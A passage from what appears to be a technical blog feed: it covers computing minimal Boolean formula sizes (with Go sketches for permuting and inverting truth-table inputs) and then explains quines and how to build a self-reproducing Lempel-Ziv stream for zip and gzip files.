<tr><td>14 <td>75248 <td>533594528 <td>1323879652 <td>58.7 seconds <td>[ 100 days ? ]
<tr><td>15 <td>94572 <td>667653642 <td>1991533294 <td>1.5 minutes <td>[ 120 days ? ]
<tr><td>16 <td>98237 <td>697228760 <td>2688762054 <td>2.1 minutes <td>[ 120 days ? ]
<tr><td>17 <td>89342 <td>628589440 <td>3317351494 <td>4.1 minutes <td>[ 90 days ? ]
<tr><td>18 <td>66951 <td>468552896 <td>3785904390 <td>9.1 minutes <td>[ 50 days ? ]
<tr><td>19 <td>41664 <td>287647616 <td>4073552006 <td>23.4 minutes <td>[ 30 days ? ]
<tr><td>20 <td>21481 <td>144079832 <td>4217631838 <td>57.0 minutes <td>[ 10 days ? ]
<tr><td>21 <td>8680 <td>55538224 <td>4273170062 <td>2.4 hours <td>2.5 days
<tr><td>22 <td>2730 <td>16099568 <td>4289269630 <td>5.2 hours <td>11.7 hours
<tr><td>23 <td>937 <td>4428800 <td>4293698430 <td>11.2 hours <td>2.2 hours
<tr><td>24 <td>228 <td>959328 <td>4294657758 <td>22.0 hours <td>33.2 minutes
<tr><td>25 <td>103 <td>283200 <td>4294940958 <td>1.7 days <td>4.0 minutes
<tr><td>26 <td>21 <td>22224 <td>4294963182 <td>2.9 days <td>42 seconds
<tr><td>27 <td>10 <td>3602 <td>4294966784 <td>4.7 days <td>2.4 seconds
<tr><td>28 <td>3 <td>512 <td>4294967296 <td>[ 7 days ? ] <td>0.1 seconds
</table>
</center>
<p class=pp>
The bracketed times are estimates based on the work involved: I did not
wait that long for the intermediate search steps.
The search algorithm is quite a bit worse than generate until there are
very few functions left to find.
However, it comes in handy just when it is most useful: when the
generate algorithm has slowed to a crawl.
If we run generate through formulas of size 22 and then switch
to search for 23 onward, we can run the whole computation in
just over half a day of CPU time.
</p>
<p class=pp>
The computation of a(5) identified the sizes of all 616,126
canonical Boolean functions of 5 inputs.
In contrast, there are <a href="http://oeis.org/A000370">just over 200 trillion canonical Boolean functions of 6 inputs</a>.
Determining a(6) is unlikely to happen by brute force computation, no matter what clever tricks we use.
</p>
<h3>Adding XOR</h3>
<p class=pp>We've assumed the use of just AND and OR as our
basis for the Boolean formulas. If we also allow XOR, functions
can be written using many fewer operators.
In particular, a hardest function for the 1-, 2-, 3-, and 4-input
cases—parity—is now trivial.
Knuth examines the complexity of 5-input Boolean functions
using AND, OR, and XOR in detail in <a href="http://www-cs-faculty.stanford.edu/~uno/taocp.html">The Art of Computer Programming, Volume 4A</a>.
Section 7.1.2's Algorithm L is the same as our Algorithm 3 above,
given for computing 4-input functions.
Knuth mentions that to adapt it for 5-input functions one must
treat only canonical functions and gives results for 5-input functions
with XOR allowed.
So another way to check our work is to add XOR to our Algorithm 4
and check that our results match Knuth's.
</p>
<p class=pp>
Because the minimum formula sizes are smaller (at most 12), the
computation of sizes with XOR is much faster than before:
</p>
<center>
<table>
<tr><th> <th><th colspan=5>————— # of Functions —————<th>
<tr><th>Size <th width=10><th>Canonical <th width=10><th>All <th width=10><th>All, Cumulative <th width=10><th>Time
<tr><td align=right>0 <td><td align=right>1 <td><td align=right>10 <td><td align=right>10 <td><td>
<tr><td align=right>1 <td><td align=right>3 <td><td align=right>102 <td><td align=right>112 <td><td align=right>< 0.1 seconds
<tr><td align=right>2 <td><td align=right>5 <td><td align=right>1140 <td><td align=right>1252 <td><td align=right>< 0.1 seconds
<tr><td align=right>3 <td><td align=right>20 <td><td align=right>11570 <td><td align=right>12822 <td><td align=right>< 0.1 seconds
<tr><td align=right>4 <td><td align=right>93 <td><td align=right>109826 <td><td align=right>122648 <td><td align=right>< 0.1 seconds
<tr><td align=right>5 <td><td align=right>366 <td><td align=right>936440 <td><td align=right>1059088 <td><td align=right>0.1 seconds
<tr><td align=right>6 <td><td align=right>1730 <td><td align=right>7236880 <td><td align=right>8295968 <td><td align=right>0.7 seconds
<tr><td align=right>7 <td><td align=right>8782 <td><td align=right>47739088 <td><td align=right>56035056 <td><td align=right>4.5 seconds
<tr><td align=right>8 <td><td align=right>40297 <td><td align=right>250674320 <td><td align=right>306709376 <td><td align=right>24.0 seconds
<tr><td align=right>9 <td><td align=right>141422 <td><td align=right>955812256 <td><td align=right>1262521632 <td><td align=right>95.5 seconds
<tr><td align=right>10 <td><td align=right>273277 <td><td align=right>1945383936 <td><td align=right>3207905568 <td><td align=right>200.7 seconds
<tr><td align=right>11 <td><td align=right>145707 <td><td align=right>1055912608 <td><td align=right>4263818176 <td><td align=right>121.2 seconds
<tr><td align=right>12 <td><td align=right>4423 <td><td align=right>31149120 <td><td align=right>4294967296 <td><td align=right>65.0 seconds
</table>
</center>
<p class=pp>
Knuth does not discuss anything like Algorithm 5,
because the search for specific functions does not apply to
the AND, OR, and XOR basis. XOR is a non-monotone
function (it can both turn bits on and turn bits off), so
there is no test like our “<code>if fg OR g == fg</code>”
and no small set of “don't care” bits to trim the search for f.
The search for an appropriate f in the XOR case would have
to try all f of the right size, which is exactly what Algorithm 4 already does.
</p>
<p class=pp>
Volume 4A also considers the problem of building minimal circuits,
which are like formulas but can use common subexpressions additional times for free,
and the problem of building the shallowest possible circuits.
See Section 7.1.2 for all the details.
</p>
<h3>Code and Web Site</h3>
<p class=pp>
The web site <a href="http://boolean-oracle.swtch.com">boolean-oracle.swtch.com</a>
lets you type in a Boolean expression and gives back the minimal formula for it.
It uses tables generated while running Algorithm 5; those tables and the
programs described in this post are also <a href="http://boolean-oracle.swtch.com/about">available on the site</a>.
</p>
<h3>Postscript: Generating All Permutations and Inversions</h3>
<p class=pp>
The algorithms given above depend crucially on the step
“<code>for each function ff equivalent to f</code>,”
which generates all the ff obtained by permuting or inverting inputs to f,
but I did not explain how to do that.
We already saw that we can manipulate the binary truth table representation
directly to turn <code>f</code> into <code>¬f</code> and to compute
combinations of functions.
We can also manipulate the binary representation directly to
invert a specific input or swap a pair of adjacent inputs.
Using those operations we can cycle through all the equivalent functions.
</p>
<p class=pp>
To invert a specific input,
let's consider the structure of the truth table.
The index of a bit in the truth table encodes the inputs for that entry.
For example, the low bit of the index gives the value of the first input.
So the even-numbered bits—at indices 0, 2, 4, 6, ...—correspond to
the first input being false, while the odd-numbered bits—at indices 1, 3, 5, 7, ...—correspond
to the first input being true.
Changing just that bit in the index corresponds to changing the
single variable, so indices 0, 1 differ only in the value of the first input,
as do 2, 3, and 4, 5, and 6, 7, and so on.
Given the truth table for f(V, W, X, Y, Z) we can compute
the truth table for f(¬V, W, X, Y, Z) by swapping adjacent bit pairs
in the original truth table.
Even better, we can do all the swaps in parallel using a bitwise
operation.
To invert a different input, we swap larger runs of bits.
</p>
<center>
<table>
<tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>)
<tr><td>f(¬V, W, X, Y, Z) <td><td><code>(f&0x55555555)<< 1 | (f>> 1)&0x55555555</code>
<tr><td>f(V, ¬W, X, Y, Z) <td><td><code>(f&0x33333333)<< 2 | (f>> 2)&0x33333333</code>
<tr><td>f(V, W, ¬X, Y, Z) <td><td><code>(f&0x0f0f0f0f)<< 4 | (f>> 4)&0x0f0f0f0f</code>
<tr><td>f(V, W, X, ¬Y, Z) <td><td><code>(f&0x00ff00ff)<< 8 | (f>> 8)&0x00ff00ff</code>
<tr><td>f(V, W, X, Y, ¬Z) <td><td><code>(f&0x0000ffff)<<16 | (f>>16)&0x0000ffff</code>
</table>
</center>
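<p class=lp>
Here is a minimal Go sketch of that operation, using exactly the masks
and shifts from the table above (the array and function names are mine):
</p>
<pre class=indent>
// Masks and shifts for inverting input i (V = 0 ... Z = 4),
// taken from the table above.
var invMask = [5]uint32{0x55555555, 0x33333333, 0x0f0f0f0f, 0x00ff00ff, 0x0000ffff}
var invShift = [5]uint{1, 2, 4, 8, 16}

// invertInput returns the truth table of f with input i negated.
func invertInput(f uint32, i int) uint32 {
	m, s := invMask[i], invShift[i]
	return (f&m)<<s | (f>>s)&m
}
</pre>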
<p class=lp>
Being able to invert a specific input lets us consider all possible
inversions by building them up one at a time.
The <a href="http://oeis.org/A003188">Gray code</a> lets us
enumerate all possible 5-bit input codes while changing only 1 bit at
a time as we move from one input to the next:
</p>
<center>
0, 1, 3, 2, 6, 7, 5, 4, <br>
12, 13, 15, 14, 10, 11, 9, 8, <br>
24, 25, 27, 26, 30, 31, 29, 28, <br>
20, 21, 23, 22, 18, 19, 17, 16
</center>
<p class=lp>
This minimizes
the number of inversions we need: to consider all 32 cases, we only
need 31 inversion operations.
In contrast, visiting the 5-bit input codes in the usual binary order 0, 1, 2, 3, 4, ...
would often need to change multiple bits, like when changing from 3 to 4.
</p>
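<p class=pp>
Here is a hedged Go sketch of that enumeration. The standard formula
<code>i ^ (i>>1)</code> generates exactly the Gray code sequence listed above;
<code>invertInput</code> is the helper sketched earlier, and the function name is mine:
</p>
<pre class=indent>
// forEachInversion calls visit once for each of the 32 ways of
// negating a subset of the inputs to f, walking the patterns in
// Gray code order so that each step inverts exactly one input.
// Requires the standard "math/bits" package.
func forEachInversion(f uint32, visit func(uint32)) {
	visit(f) // pattern 00000: no inputs inverted
	prev := uint32(0)
	for i := uint32(1); i < 32; i++ {
		g := i ^ (i >> 1)                       // the i'th 5-bit Gray code
		input := bits.TrailingZeros32(g ^ prev) // the one input that changed
		f = invertInput(f, input)
		prev = g
		visit(f)
	}
}
</pre>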
<p class=pp>
To swap a pair of adjacent inputs, we can again take advantage of the truth table.
For a pair of inputs, there are four cases: 00, 01, 10, and 11. We can leave the
00 and 11 cases alone, because they are invariant under swapping,
and concentrate on swapping the 01 and 10 bits.
The first two inputs change most often in the truth table: each run of 4 bits
corresponds to those four cases.
In each run, we want to leave the first and fourth alone and swap the second and third.
For later inputs, the four cases consist of sections of bits instead of single bits.
</p>
<center>
<table>
<tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>)
<tr><td>f(<b>W, V</b>, X, Y, Z) <td><td><code>f&0x99999999 | (f&0x22222222)<<1 | (f>>1)&0x22222222</code>
<tr><td>f(V, <b>X, W</b>, Y, Z) <td><td><code>f&0xc3c3c3c3 | (f&0x0c0c0c0c)<<2 | (f>>2)&0x0c0c0c0c</code>
<tr><td>f(V, W, <b>Y, X</b>, Z) <td><td><code>f&0xf00ff00f | (f&0x00f000f0)<<4 | (f>>4)&0x00f000f0</code>
<tr><td>f(V, W, X, <b>Z, Y</b>) <td><td><code>f&0xff0000ff | (f&0x0000ff00)<<8 | (f>>8)&0x0000ff00</code>
</table>
</center>
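<p class=lp>
The same masking idiom handles the swaps. Here is a short Go sketch built
from the table above (array and function names are mine):
</p>
<pre class=indent>
// Masks for swapping adjacent inputs i and i+1 (V = 0 ... Z = 4),
// taken from the table above: bits to keep, bits to move, and shift amount.
var swapKeep = [4]uint32{0x99999999, 0xc3c3c3c3, 0xf00ff00f, 0xff0000ff}
var swapMove = [4]uint32{0x22222222, 0x0c0c0c0c, 0x00f000f0, 0x0000ff00}
var swapShift = [4]uint{1, 2, 4, 8}

// swapAdjacent returns the truth table of f with inputs i and i+1 exchanged.
func swapAdjacent(f uint32, i int) uint32 {
	k, m, s := swapKeep[i], swapMove[i], swapShift[i]
	return f&k | (f&m)<<s | (f>>s)&m
}
</pre>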
<p class=lp>
Being able to swap a pair of adjacent inputs lets us consider all
possible permutations by building them up one at a time.
Again it is convenient to have a way to visit all permutations by
applying only one swap at a time.
Here Volume 4A comes to the rescue.
Section 7.2.1.2 is titled “Generating All Permutations,” and Knuth delivers
many algorithms to do just that.
The most convenient for our purposes is Algorithm P, which
generates a sequence that considers all permutations exactly once
with only a single swap of adjacent inputs between steps.
Knuth calls it Algorithm P because it corresponds to the
“Plain changes” algorithm used by <a href="http://en.wikipedia.org/wiki/Change_ringing">bell ringers in 17th century England</a>
to ring a set of bells in all possible permutations.
The algorithm is described in a manuscript written around 1653!
</p>
<p class=pp>
We can examine all possible permutations and inversions by
nesting a loop over all permutations inside a loop over all inversions,
and in fact that's what my program does.
Knuth does one better, though: his Exercise 7.2.1.2-20
suggests that it is possible to build up all the possibilities
using only adjacent swaps and inversion of the first input.
Negating arbitrary inputs is not hard, though, and still does
minimal work, so the code sticks with Gray codes and Plain changes.
</p></p>
Zip Files All The Way Downtag:research.swtch.com,2012:research.swtch.com/zip2010-03-18T00:00:00-04:002010-03-18T00:00:00-04:00Did you think it was turtles?
<p><p class=lp>
Stephen Hawking begins <i><a href="http://www.amazon.com/-/dp/0553380168">A Brief History of Time</a></i> with this story:
</p>
<blockquote>
<p class=pp>
A well-known scientist (some say it was Bertrand Russell) once gave a public lecture on astronomy. He described how the earth orbits around the sun and how the sun, in turn, orbits around the center of a vast collection of stars called our galaxy. At the end of the lecture, a little old lady at the back of the room got up and said: “What you have told us is rubbish. The world is really a flat plate supported on the back of a giant tortoise.” The scientist gave a superior smile before replying, “What is the tortoise standing on?” “You're very clever, young man, very clever,” said the old lady. “But it's turtles all the way down!”
</p>
</blockquote>
<p class=lp>
Scientists today are pretty sure that the universe is not actually turtles all the way down,
but we can create that kind of situation in other contexts.
For example, here we have <a href="http://www.youtube.com/watch?v=Y-gqMTt3IUg">video monitors all the way down</a>
and <a href="http://www.amazon.com/gp/customer-media/product-gallery/0387900926/ref=cm_ciu_pdp_images_all">set theory books all the way down</a>,
and <a href="http://blog.makezine.com/archive/2009/01/thousands_of_shopping_carts_stake_o.html">shopping carts all the way down</a>.
</p>
<p class=pp>
And here's a computer storage equivalent:
look inside <a href="http://swtch.com/r.zip"><code>r.zip</code></a>.
It's zip files all the way down:
each one contains another zip file under the name <code>r/r.zip</code>.
(For the die-hard Unix fans, <a href="http://swtch.com/r.tar.gz"><code>r.tar.gz</code></a> is
gzipped tar files all the way down.)
Like the line of shopping carts, it never ends,
because it loops back onto itself: the zip file contains itself!
And it's probably less work to put together a self-reproducing zip file
than to put together all those shopping carts,
at least if you're the kind of person who would read this blog.
This post explains how.
</p>
<p class=pp>
Before we get to self-reproducing zip files, though,
we need to take a brief detour into self-reproducing programs.
</p>
<h3>Self-reproducing programs</h3>
<p class=pp>
The idea of self-reproducing programs dates back to the 1960s.
My favorite statement of the problem is the one Ken Thompson gave in his 1983 Turing Award address:
</p>
<blockquote>
<p class=pp>
In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular.
</p>
<p class=pp>
More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about “shortest” was just an incentive to demonstrate skill and determine a winner.
</p>
</blockquote>
<p class=lp>
<b>Spoiler alert!</b>
I agree: if you have never done this, I urge you to try it on your own.
The internet makes it so easy to look things up that it's refreshing
to discover something yourself once in a while.
Go ahead and spend a few days figuring it out. This blog will still be here
when you get back.
(If you don't mind the spoilers, the entire <a href="http://cm.bell-labs.com/who/ken/trust.html">Turing award address</a> is worth reading.)
</p>
<center>
<br><br>
<i>(Spoiler blocker.)</i>
<br>
<a href="http://www.robertwechsler.com/projects.html"><img src="https://research.swtch.com/applied_geometry.jpg"></a>
<br>
<i><a href="http://www.robertwechsler.com/projects.html">http://www.robertwechsler.com/projects.html</a></i>
<br><br>
</center>
<p class=pp>
Let's try to write a Python program that prints itself.
It will probably be a <code>print</code> statement, so here's a first attempt,
run at the interpreter prompt:
</p>
<pre class=indent>
>>> print '<span style="color: #005500">hello</span>'
hello
</pre>
<p class=lp>
That didn't quite work. But now we know what the program is, so let's print it:
</p>
<pre class=indent>
>>> print "<span style="color: #005500">print 'hello'</span>"
print 'hello'
</pre>
<p class=lp>
That didn't quite work either. The problem is that when you execute
a simple print statement, it only prints part of itself: the argument to the print.
We need a way to print the rest of the program too.
</p>
<p class=pp>
The trick is to use recursion: you write a string that is the whole program,
but with itself missing, and then you plug it into itself before passing it to print.
</p>
<pre class=indent>
>>> s = '<span style="color: #005500">print %s</span>'; print s % repr(s)
print 'print %s'
</pre>
<p class=lp>
Not quite, but closer: the problem is that the string <code>s</code> isn't actually
the program. But now we know the general form of the program:
<code>s = '<span style="color: #005500">%s</span>'; print s % repr(s)</code>.
That's the string to use.
</p>
<pre class=indent>
>>> s = '<span style="color: #005500">s = %s; print s %% repr(s)</span>'; print s % repr(s)
s = 's = %s; print s %% repr(s)'; print s % repr(s)
</pre>
<p class=lp>
Recursion for the win.
</p>
<p class=pp>
This form of self-reproducing program is often called a <a href="http://en.wikipedia.org/wiki/Quine_(computing)">quine</a>,
in honor of the philosopher and logician W. V. O. Quine,
who discovered the paradoxical sentence:
</p>
<blockquote>
“Yields falsehood when preceded by its quotation”<br>yields falsehood when preceded by its quotation.
</blockquote>
<p class=lp>
The simplest English form of a self-reproducing quine is a command like:
</p>
<blockquote>
Print this, followed by its quotation:<br>“Print this, followed by its quotation:”
</blockquote>
<p class=lp>
There's nothing particularly special about Python that makes quining possible.
The most elegant quine I know is a Scheme program that is a direct, if somewhat inscrutable, translation of that
sentiment:
</p>
<pre class=indent>
((lambda (x) `<span style="color: #005500">(</span>,x <span style="color: #005500">'</span>,x<span style="color: #005500">)</span>)
'<span style="color: #005500">(lambda (x) `(,x ',x))</span>)
</pre>
<p class=lp>
I think the Go version is a clearer translation, at least as far as the quoting is concerned:
</p>
<pre class=indent>
/* Go quine */
package main
import "<span style="color: #005500">fmt</span>"
func main() {
fmt.Printf("<span style="color: #005500">%s%c%s%c\n</span>", q, 0x60, q, 0x60)
}
var q = `<span style="color: #005500">/* Go quine */
package main
import "fmt"
func main() {
fmt.Printf("%s%c%s%c\n", q, 0x60, q, 0x60)
}
var q = </span>`
</pre>
<p class=lp>(I've colored the data literals green throughout to make it clear what is program and what is data.)</p>
<p class=pp>The Go program has the interesting property that, ignoring the pesky newline
at the end, the entire program is the same thing twice (<code>/* Go quine */ ... q = `</code>).
That got me thinking: maybe it's possible to write a self-reproducing program
using only a repetition operator.
And you know what programming language has essentially only a repetition operator?
The language used to encode Lempel-Ziv compressed files
like the ones used by <code>gzip</code> and <code>zip</code>.
</p>
<h3>Self-reproducing Lempel-Ziv programs</h3>
<p class=pp>
Lempel-Ziv compressed data is a stream of instructions with two basic
opcodes: <code>literal(</code><i>n</i><code>)</code> followed by
<i>n</i> bytes of data means write those <i>n</i> bytes into the
decompressed output,
and <code>repeat(</code><i>d</i><code>,</code> <i>n</i><code>)</code>
means look backward <i>d</i> bytes from the current location
in the decompressed output and copy the <i>n</i> bytes you find there
into the output stream.
</p>
<p class=pp>
The programming exercise, then, is this: write a Lempel-Ziv program
using just those two opcodes that prints itself when run.
In other words, write a compressed data stream that decompresses to itself.
Feel free to assume any reasonable encoding for the <code>literal</code>
and <code>repeat</code> opcodes.
For the grand prize, find a program that decompresses to
itself surrounded by an arbitrary prefix and suffix,
so that the sequence could be embedded in an actual <code>gzip</code>
or <code>zip</code> file, which has a fixed-format header and trailer.
</p>
<p class=pp>
<b>Spoiler alert!</b>
I urge you to try this on your own before continuing to read.
It's a great way to spend a lazy afternoon, and you have
one critical advantage that I didn't: you know there is a solution.
</p>
<center>
<br><br>
<i>(Spoiler blocker.)</i>
<br>
<a href=""><img src="https://research.swtch.com/the_best_circular_bike(sbcc_sbma_students_roof).jpg"></a>
<br>
<i><a href="http://www.robertwechsler.com/thebest.html">http://www.robertwechsler.com/thebest.html</a></i>
<br><br>
</center>
<p class=lp>By the way, here's <a href="http://swtch.com/r.gz"><code>r.gz</code></a>, gzip files all the way down.
<pre class=indent>
$ gunzip < r.gz > r
$ cmp r r.gz
$
</pre>
<p class=lp>The nice thing about <code>r.gz</code> is that even broken web browsers
that ordinarily decompress downloaded gzip data before storing it to disk
will handle this file correctly!
</p>
<p class=pp>Enough stalling to hide the spoilers.
Let's use this shorthand to describe Lempel-Ziv instructions:
<code>L</code><i>n</i> and <code>R</code><i>n</i> are
shorthand for <code>literal(</code><i>n</i><code>)</code> and
<code>repeat(</code><i>n</i><code>,</code> <i>n</i><code>)</code>,
and the program assumes that each code is one byte.
<code>L0</code> is therefore the Lempel-Ziv no-op;
<code>L5</code> <code>hello</code> prints <code>hello</code>;
and so does <code>L3</code> <code>hel</code> <code>R1</code> <code>L1</code> <code>o</code>.
</p>
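<p class=pp>
If you want to experiment, here is a minimal Go sketch of an interpreter
for this shorthand. The concrete byte values (a code byte below 0x80 is
<code>L</code><i>n</i>, and 0x80+<i>n</i> is <code>R</code><i>n</i>)
are my own assumption, made only so the sketch runs; the post itself
assumes only that each code is one byte:
</p>
<pre class=indent>
// decode interprets the toy shorthand: byte n < 0x80 is Ln
// (copy the next n program bytes to the output); byte n >= 0x80
// is R(n-0x80) (re-copy the last n-0x80 bytes of the output).
func decode(prog []byte) []byte {
	var out []byte
	for i := 0; i < len(prog); {
		op := int(prog[i])
		i++
		if op < 0x80 { // Ln: literal
			out = append(out, prog[i:i+op]...)
			i += op
		} else { // Rn: repeat the last n bytes of output
			n := op - 0x80
			out = append(out, out[len(out)-n:]...)
		}
	}
	return out
}
</pre>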
<p class=pp>
Here's a Lempel-Ziv program that prints itself.
(Each line is one instruction.)
</p>
<br>
<center>
<table border=0>
<tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L4</span></code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L0</span></code></td><td></td><td><code>L0 L0 L0 L0</code></td></tr>
</table>
</center>
<br>
<p class=lp>
(The two columns Code and Output contain the same byte sequence.)
</p>
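<p class=pp>
With that assumed byte encoding you can check the table mechanically.
This fragment belongs inside a <code>main</code> or test function, with the
<code>decode</code> sketch above in scope and the standard <code>bytes</code>
and <code>fmt</code> packages imported:
</p>
<pre class=indent>
// The self-reproducing program above, one byte per code plus literal
// data, using the assumed encoding Ln = n, Rn = 0x80+n.
prog := []byte{
	0x00, 0x00, 0x00,             // L0 L0 L0
	0x04, 0x00, 0x00, 0x00, 0x04, // L4 "L0 L0 L0 L4"
	0x84,                         // R4
	0x04, 0x84, 0x04, 0x84, 0x04, // L4 "R4 L4 R4 L4"
	0x84,                         // R4
	0x04, 0x00, 0x00, 0x00, 0x00, // L4 "L0 L0 L0 L0"
}
fmt.Println(bytes.Equal(decode(prog), prog)) // prints: true
</pre>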
<p class=pp>
The interesting core of this program is the 6-byte sequence
<code>L4 R4 L4 R4 L4 R4</code>, which prints the 8-byte sequence <code>R4 L4 R4 L4 R4 L4 R4 L4</code>.
That is, it prints itself with an extra byte before and after.
</p>
<p class=pp>
When we were trying to write the self-reproducing Python program,
the basic problem was that the print statement was always longer
than what it printed. We solved that problem with recursion,
computing the string to print by plugging it into itself.
Here we took a different approach.
The Lempel-Ziv program is
particularly repetitive, so that a repeated substring ends up
containing the entire fragment. The recursion is in the
representation of the program rather than its execution.
Either way, that fragment is the crucial point.
Before the final <code>R4</code>, the output lags behind the input.
Once it executes, the output is one code ahead.
</p>
<p class=pp>
The <code>L0</code> no-ops are plugged into
a more general variant of the program, which can reproduce itself
with the addition of an arbitrary three-byte prefix and suffix:
</p>
<br>
<center>
<table border=0>
<tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500"><i>aa bb cc</i> L4</span></code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 <i>xx yy zz</i></span></code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr>
</table>
</center>
<br>
<p class=lp>
(The byte sequence in the Output column is <code><i>aa bb cc</i></code>, then
the byte sequence from the Code column, then <code><i>xx yy zz</i></code>.)
</p>
<p class=pp>
It took me the better part of a quiet Sunday to get this far,
but by the time I got here I knew the game was over
and that I'd won.
From all that experimenting, I knew it was easy to create
a program fragment that printed itself minus a few instructions
or even one that printed an arbitrary prefix
and then itself, minus a few instructions.
The extra <code>aa bb cc</code> in the output
provides a place to attach such a program fragment.
Similarly, it's easy to create a fragment to attach
to the <code>xx yy zz</code> that prints itself,
minus the first three instructions, plus an arbitrary suffix.
We can use that generality to attach an appropriate
header and trailer.
</p>
<p class=pp>
Here is the final program, which prints itself surrounded by an
arbitrary prefix and suffix.
<code>[P]</code> denotes the <i>p</i>-byte compressed form of the prefix <code>P</code>;
similarly, <code>[S]</code> denotes the <i>s</i>-byte compressed form of the suffix <code>S</code>.
</p>
<br>
<center>
<table border=0>
<tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print prefix</span></i></td>
<td></td>
<td><code>[P]</code></td>
<td></td>
<td><code>P</code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print </i>p<i>+1 bytes</i></span></td>
<td></td>
<td><code>L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> <span style="color: #005500">[P] L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td>
<td></td>
<td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>repeat last </i>p<i>+1 printed bytes</i></span></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
<td></td>
<td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td>
<td></td>
<td><code>L1 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td>
<td></td>
<td><code>L1 <span style="color: #005500">L1</span></code></td>
<td></td>
<td><code>L1</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td>
<td></td>
<td><code>L4 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code><span style="color: #005500"> L1 L1 L4</span></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td>
<td></td>
<td><code>R4</code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td>
<td></td>
<td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td>
<td></td>
<td><code>R4 L4 R4 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td>
<td></td>
<td><code>R4</code></td>
<td></td>
<td><code>R4 L4 R4 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td>
<td></td>
<td><code>L4 <span style="color: #005500">R4 L0 L0 L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"></span></code></td>
<td></td>
<td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td>
<td></td>
<td><code>R4</code></td>
<td></td>
